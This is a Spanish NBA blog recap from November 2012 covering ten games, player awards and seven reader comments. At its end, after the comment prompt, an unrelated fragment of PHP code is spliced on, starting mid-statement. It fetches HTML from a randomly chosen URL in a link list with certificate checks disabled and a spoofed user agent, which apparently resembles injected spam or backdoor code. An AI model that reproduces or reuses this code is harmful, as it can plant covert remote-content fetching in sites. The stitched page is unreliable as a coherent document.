La Crónica: Detroit por fin gana

15 de November de 2012 por Simon

Noche con diez partidos en la NBA algunos de ellos muy interesantes. En el primer partido de la jornada Philadelphia recibía a Detroit. Detroit empezó el partido con una furia feroz buscando ganar el primer partido de la temporada y se vieron muy arriba muy pronto. A partir de ahí ya solo tuvieron que mantener a raya a Philadelphia (94-76). Gran partido de Monroe 19-18 a los que añadió 6 asistencias, bien acompañado por el rookie Kyle Singler que en su primer partido de titular hizo 15 puntos con buenos porcentajes de tiro. En Philadelphia ningún jugador se salvó de la quema en un partido para olvidar.

En Boston, los Celtics se las apañaron para ganar un partido muy reñido en el que perdieron a Rondo por una lesión de tobillo en una entrada  a canasta en el tercer cuarto. Utah tuvo las dos últimas posesiones para igualar pero fallaron ambas y Garnett cerró el partido desde los tiros libres (93-98). El más destacado fue Pierce con 23 puntos acompañado de Green y Barbosa con 16 cada uno. Por parte de los Jazz el mejor fue Millsap ( 20-12).

Los Bucks pasaron por encima de Indiana sometiéndoles a un cruel castigo durante los 3 primeros cuartos. Al descanso, Milwauke ganaba de 26 en el 3º aniversario de los 55 puntos de Jennings. En el último cuarto Indiana ganó por 15 puntos el parcial pero solo le sirvió para maquillar el resultado. Jennings y Ellis con 16 puntos cada uno fueron los mejores en los Bucks (85-99). 

El partidazo de la jornada era la visita de Miami al Staples para enfrentarse a los Clippers (100-107). El partido estuvo muy igualado con constantes cambios de liderazgo hasta el final del 3º cuarto en el que Clippers tuvo una gran racha y se despegó en el marcador para ya no mirar atrás durante el 4º cuarto gracias a las acciones de Jamal Crawford y Eric Bledsoe. Los mejores en Clippers fueron Griffin con un 20-14 y Crawford que sumó 22 puntos. Lebron acabó con 30-5-7 pero la nefasta noche de Wade hizo que su esfuerzo fuera en balde.

No se quedó atrás el otro gran partido de la jornada, el Memphis-Oklahoma (107-97). Tras un buen primer cuarto de Oklahoma, Memphis forjó su victoria en el segundo cuarto con un gran parcial.En la segunda parte se dedicaron a aguantar la ventaja sobre los Thunder, que llegaron a acercarse a 6 puntos pero una serie de buenas acciones de Gay volvieron a llevar el partido a un marcador relativamente como para Memphis hasta el final del mismo. Randolph y Perkins acabaron teniendo unas palabras al final del partido que parece ser que terminaron en algo más en los vestuarios. Por parte de Memphis 28 puntos para Gay. Poco pudo hacer Durant con sus 34 puntos y 10 rebotes ante las malas noches de Westbrook y Kevin Martin. Memphis firma el mejor inicio de su historia.

En el resto de partidos de la noche, Houston ganó en casa a New Orleans (96-100)  de la mano de los extraordinarios partidos de Harden y Asik. Vasquez fue el mejor de New Orleans con 24 puntos y 9 asistencias en una mala noche para el Nº 1 del draft, Anthony Davis.  Minnesota se dejó sorprender por unos Charlotte que están con un balance positivo gracias a un Kemba Walker que firmó un gran último tiro para ganar. Los Bobcats estuvieron arriba todo el partido pero un gran arreón final de Minnesota igualó el partido para terminar cerrándolo a falta de 0.7 Walker con una bonita suspensión desde 6 metros (89- 87). Kirilenko sigue en buena forma y así lo demostró con 26 puntos y 12 rebotes.

En Dallas el gran partido de OJ Mayo y Kaman dio a los Mavericks la 5 victoria de la temporada ante unos Wizards que se quedan como único equipo sin victorias de esta temporada. (101-107). Por su parte, Chicago consiguió derrotar en la prorroga a Phoenix Suns (112-106) Tucker recogió un rechace en los últimos segundos del partido para forzar la prórroga, donde Chicago ganó con comodidad. Impresionante partido de Carlos Boozer con 28 puntos y 14 rebotes. Y en el último partido de la noche los Warriors recuperaron el 50% de balance ante unos Hawks sin Al Horford por enfermedad (88-92). El mejor fue el rookie Harrison Barnes con 19 puntos y 13 rebotes.

PREMIOS

MVP: ¿Premio para Carlos Boozer? Pues sí. El muchas veces denostado jugador de los Bulls fue el mejor de su equipo en la victoria frente los Suns con 28 puntos y 14 rebotes. Rudy Gay fue otro de los destacados con también 28 puntos pero 6 rebotes y 5 asistencias.

Rookie: El rookie del día es Harrison Barnes tras liderar a los Warriors a la victoria con 19 puntos y 13 rebotes.

Sorpresa: Andrei Kirilenko ha vuelto en plena forma de Europa, como lo demuestra su nivel en estos primeros partidos de la temporada. Anoche fueron 26 puntos (9 de 12) y 12 rebotes. Por su parte, Greivis Vasquez consiguió 24 puntos, 5 rebotes y 9 asistencias. Kevin Seraphin aprovechó las ausencias anotando 16 puntos en 22 minutos de juego. En Phoenix fue Sebastian Telfair, con 17 puntos y un gran último cuarto, el que llevó el partido a la prórroga.

Decepción: Los Wizards se han quedado solos como el único equipo que no ha sido capaz todavía de estrenarse. En el ámbito personal, mal día para Dwyane Wade. Había dudas de que jugara. Al final lo hizo y el resultado no pudo ser peor: 2 de 10 en tiros de campo, 6 puntos, 5 pérdidas, derrota y este impresionante tapón de Bledsoe de regalo. Tampoco tuvo el día Paul George. Falló tantos tiros como puntos anotó, 12.

Esfuerzo en vano: Comparten premios los, posiblemente, 2 mejores jugadores de la liga. Kevin Durant se fue a los 34 puntos, 10 rebotes, 5 asistencias, 3 robos y 2 tapones y Lebron James a los 30 puntos, 5 rebotes, 7 asistencias y 2 tapones pero el resultado para sus equipos fue el mismo: derrota.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Esteban dice:
    #1

    mucho mucho cuidado con los clippers, y ya sabemos cuantos jugadores les faltan, ahora si que me di por vencido con lamar odom, 1.4 ppp en 8 presentaciones no da la talla, muchos millones desperdiciados en el, ya no parece que tuviera arreglo, kenyom martin esta libre, espero que el tacaño dueño de los clippers aporvehce esta oportunidad y lo coja

    el barba harden recupera sencaciones luego de algunos malos partidos, esta claro que frente a rivales de poca monta puede lucirse, mientras que ASIK sorprende a propios y extraños, sino un rebotero increible, solo la inhumanidad de varejao lo supera
    jeremy lin debe estar agredecido de la llegada de harden, asi pasa bastante desapercibido un arraque bastante callado por su parte

    bobcats, aun con muchas bajas, en un equipo muy pobre, logran suplirla, kemba se instala definitivamente en los 20 ppp y sessiones de cara al mejor sexto hombre de la temporada, cuando vuelvan hernderson y gordon pueden aun ser mas eligrosos, AL FIN UNA VEZ SE RIE DE NOSOTROS JORDAN

    los de wizards ya es lamentable, es cierto que le faltan sus dos jugadores mas importantes, pero cambiaron a LEWIS y su contrato parcialmente garantizado por ARIZA y OKAFOR, semejante inversion y perdida de espacio salarial, merece algo mas de estos dos jugadores, y pensar que tienen contrato tamb para la prozima temporada

    detroit, por lejos el peor equipo de la nba, pues a ellos si que no les falta nadie, sale de perdedores por primera vez, utilizando como victimas a unos agotados 76ers

    DONDE SUENAN LAS ALARMAS es en INDIANA, es certo que les falta el desahogo ofensivo que significaba granger, pero el no volvera hasta dentro de dos meses, que haran hasta ese momento? seguir perdiendo juegos por goleadas y quedarse en 75 puntos otra vez? tienen un record muy negativo

    HORA DE ACTIVAR pacers, necesitan urgente un anotador compulsivo capaz de generarse sus propios tiros y que tire una y otra y otra vez, nisiquiera debe ser demasiado bueno, nombres que podrian aparecer a la venta, marcus thorton, monta ellis, UN J.R. SMITH incluso aunque dudo de que los traspasen, BEN GORDON

    en fin un anotador y urgente

      Citar

  2. Ruxixón dice:
    #2

    Esteban yo creo que los Wizards son aún peores que los Pistons,los vi ayer contra Bobcats y son una calamidad de equipo,de hecho varias veces que enfocaron a Wittman y tenía cara de “esto no hay por donde cogerlo”.Yo me repito,Okafor traspasarlo si puedes,si no ni que lo pongan en las rotaciones,a día de hoy es un Kwame Brown de la vida -dicho esto hará un partidazo dentro de nada- y el tiempo que esté en pista es tiempo que no aprovechas en Seraphin y Vesely.Por otra parte,Beal no se adaptado por el momento o estamos equivocados con él o le han puesto demasiada responsabilidad en ausencia de Wall,lo que está claro es que es muy precipitado en sus tiros (Where are IQ??).

    En Indiana quién no da el paso es Hibbert,no sé cómo lo plantearán por EEUU pero no responde al contrato que tiene y al supuesto status de uno de los mejores center de la liga.Fatal su temporada y una de las grandes decepciones individuales dentro de la decepción conjunta de los Pacers que se han derrumbado como un castillo de naipes sin Granger.Tampoco los 76ers me despiertan grandes sensaciones hasta ahora -habéis visto el corte de pelo de Bynum???-.

    Y bueno,positivas confirmaciones de Memphis y Clippers.De los primeros ya me toca ver algún encuentro,de los Clippers decir que han dado un paso más respecto a la pasada campaña.Crawford está que se sale desde el banquillo,está magnífico.Por otra parte no veo mejora en Blake Griffin en cuanto al rango de tiro pero bueno,llevamos poco aún.

      Citar

  3. Esteban dice:
    #3

    Ruxixón:
    Esteban yo creo que los Wizards son aún peores que los Pistons,los vi ayer contra Bobcats y son una calamidad de equipo,de hecho varias veces que enfocaron a Wittman y tenía cara de “esto no hay por donde cogerlo”.Yo me repito,Okafor traspasarlo si puedes,si no ni que lo pongan en las rotaciones,a día de hoy es un Kwame Brown de la vida -dicho esto hará un partidazo dentro de nada- y el tiempo que esté en pista es tiempo que no aprovechas en Seraphin y Vesely.Por otra parte,Beal no se adaptado por el momento o estamos equivocados con él o le han puesto demasiada responsabilidad en ausencia de Wall,lo que está claro es que es muy precipitado en sus tiros (Where are IQ??).

    En Indiana quién no da el paso es Hibbert,no sé cómo lo plantearán por EEUU pero no responde al contrato que tiene y al supuesto status de uno de los mejores center de la liga.Fatal su temporada y una de las grandes decepciones individuales dentro de la decepción conjunta de los Pacers que se han derrumbado como un castillo de naipes sin Granger.Tampoco los 76ers me despiertan grandes sensaciones hasta ahora -habéis visto el corte de pelo de Bynum???-.

    Y bueno,positivas confirmaciones de Memphis y Clippers.De los primeros ya me toca ver algún encuentro,de los Clippers decir que han dado un paso más respecto a la pasada campaña.Crawford está que se sale desde el banquillo,está magnífico.Por otra parte no veo mejora en Blake Griffin en cuanto al rango de tiro pero bueno,llevamos poco aún.

    cuando digo que detroit son peores que los wizards, es por que a estos aun les faltan wall y nene, quienes serian sus mejores jugadores, incluso estoy seguro que con ellos dos mejoraran bastante, pues son dos armas capaz de promediar 20 ppp, cosa que no tiene detroit ni tendra

    en el analisis de los pacers hable de lo sobrestimado de hibbert, es un buen pivot y poco mas, no vale ese contrato, pero asi es la nba, yo hoy lo cambiaria por un perimetral que reemplaze a granger y me la jugaria con mahimi de centro, hibbert aun tiene un gran valor y varios equipos quisieran un grandote como el, los propios bucks creo que darian a ellis y dalembert por el

    los 76ers les pasa como a los wizards, cuando vuelvan bynum veremos, por lo pronto una decpecion a la altura de hibbert es la de turner y creo que sin vuelta atras, le han dado las llaves del equipo y no ha sabido como abrir la puerta, lo suyo lamentable como “jugador franquicia”, aunque aun es un buen defensor y rebotar y como jguador de rol puede ser extraordinario, pero no mas que eso, los 76ers necesitan ya otra “estrella” que no sea turner y el puede ser una buena moneda de cambio, por su supuesto potencial, ES AHORA O NUNCA, si sigue asi, el supuesto potencial pasara a la categoria d einexistente

    griffin no ah mejorado casi en nada desde que llego a la NBA, parece que lanza algo mejor libres pero solo eso, bien hacen los clippers en armar un equipo TAN profundo, aun sin hill y billups y casi que sin odom son una gran equipo, PROFUNDIDAD ES LO QUE LES SOBRA

      Citar

  4. GreenPride dice:
    #4

    De el miércoles vi los dos grandes partidos.
    En el Grizzlies-Thunder gran victoria de los Osos que de momento han empezado la temporada como un tiro. Esta vez fue el banco el que les dió la delantera en el partido tras un buen inicio de los de OKC. Es un equipo con las ideas muy claras, primero el juego interior con Marc&Z-Bo haciendo daño y desde ahí a jugar con Gay haciendo un gran inicio de temporada (mucho menos chupón y anotando en momentos calientes) y con todos los demás carburando, una gran defensa y un banquillo que saca las garras. Ayer fenomenales Bayless y Pondexter, el día anterior Ellington. Si Pondexter y Ellington siguen anotando y Arthur se recupera bien será un banquillo de plenas garantías aunque la clave sigue siendo que la salud no lastre a ninguno de sus primeros espadas principalmente Marc, Zach y Gay. Creo que no soy muy original si digo que los de Memphis son el equipo más en forma del momento tras apalizar al campeón en casa y ganar con autoridad al subcampeón a domicilio. Por OKC partidazo de Durant pero ante el mal día en el tiro de Westbrook y Martin les faltó pegada en el ataque. Además Gay les hizo un traje y Perkins sigue siendo nulo en ataque. Yo sigo diciendo que habría aplicado la amnistía a Perk para quedarme con Harden pero bueno eso ya es otra historia. Este partido da idea del punto flaco de los Thunder que si ya el año pasado adolecían de movimiento de balón en ataque, este año sin su mejor pasador pueden colapsarse más a menudo.
    En el otro gran partido del día, los Heat volvieron a pegársela tras su derrota en Memphis en otra cancha del Oeste y contra otro equipo en gran forma como los Clippers. Esta vez, con Wade lesionado y jugando muy mermado y Bosh en uno de esos días pasota total los Clips les ganaron bien en el segundo tiempo con CP3 mandando la máquina y Crawford y Bledsoe haciendo lo que querían. El habitual partidazo de King James no fue suficiente esta vez. Por los Clippers, equipo muy interesante. Jordan parece estar mucho mejor que el año pasado y Crawford ha empezado la temporada como un tiro. Sólo les falta sumar a la causa a los lesionados Hill y Billups y al fuera de forma Odom para tener un equipo que desde mi punto de vista puede aspirar a todo. Por los Heat más allá de que dos de sus tres espadas tuviesen mal día, lo que han ganado en ataque con Allen&Lewis parece que lo están perdiendo en defensa. Ayer los Clippers les sacaron los colores en defensa y los números defensivos del equipo están todos entre los 6 o 7 peores de la NBA y sin defender no se va a ningún lado en esta liga. Es cierto que el año pasado ganaron prácticamente sin pivot pero esta estrategia la usaron sobre todo en las finales y contra ciertos equipos puede no valer como han demostrado dos equipos con buenos interiores como Grizzlies y Clippers que iniciando sus ataques por dentro han vuelto loca su defensa. Queda trabajo pero también mucho tiempo y el anillo da calma a los Heat para trabajar. Veremos si Spoelstra vuelve a dar más minutos a Joel Anthony al menos contra este tipo de de equipos.

      Citar

  5. nba dice:
    #5

    Jojo, con los Knicks , donde esta melo15 para comentar, porque menudo comienzo en el Madison algunos todavia se estan frotando los ojos, cualquiera diria que este no es el Felton al que estamos acostumbrados
    Despues de leer las primeras declaraciones de D’antoni, que vayan pidiendo una bombona de oxigeno para Pau y cia, que me da a mi que nos vamos a echar unas risas en sus partidos .
    Lo de los Clippers es de verdad ??, porque de ser asi parece que empiezan a imponer respeto

      Citar

  6. Vader dice:
    #6

    Vamos Knicks!!!

    Ahora ya sólo falta que Stat y Shumpert vuelvan bien!!

      Citar

  7. nba dice:
    #7

    Perlas de D’antoni en sus declaraciones :
    “Pau ha sido el mejor pívot en años en la NBA”, para despues decir “No creo que no haya razón alguna para que no sea un gran tirador desde los 6 metros”
    lo he sacado copiado del Marca.
    Bueno Pau, ya sabes lo que te toca …, a ver si Kobe te puede dar unas clases para mejorar tu tiro, porque parece que quiere que te conviertas en un Nowitky de la vida, en fin …

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>